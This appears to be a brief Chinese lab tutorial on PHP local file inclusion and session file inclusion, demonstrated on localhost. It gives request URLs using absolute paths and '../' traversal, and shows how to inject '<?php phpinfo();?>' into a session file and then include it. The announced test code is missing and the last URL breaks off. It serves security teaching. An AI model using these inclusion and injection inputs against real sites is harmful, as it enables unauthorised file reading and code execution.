文件包含漏洞实例操作
参考文章
本地文件包含漏洞
无限制本地文件包含漏洞
测试代码:
访问:
1.http://localhost/0x01.php?filename=D:/phpstudy/test.php(访问绝对路径,也可以访问其它盘)
2.http://localhost/0x01.php?filename=…/…/…/…/…/…/…/phpstudy/test.php(只访问当前盘)
session文件包含漏洞
利用条件:
session的存储位置可以获取
1.通过phpinfo的信息获取到session的存储位置
2.通过猜测默认的session存放位置进行尝试
如:在/var/lib/php/session目录下
3.测试代码
访问如下网址
http://localhost/2.php?ctfs=ctfs
会生成
对应的session文件名为:
文件内容为:
漏洞利用:通过ctfs写入恶意代码,例如访问如下网址:
http://localhost/2.php?ctfs=<?php phpinfo();?>
然后通过文件包含漏洞利用:
http://localhost/0x01.php?filename=D:/phpstudy/PhpStudy20180211/PHPTutorial/tmp/tmp/ses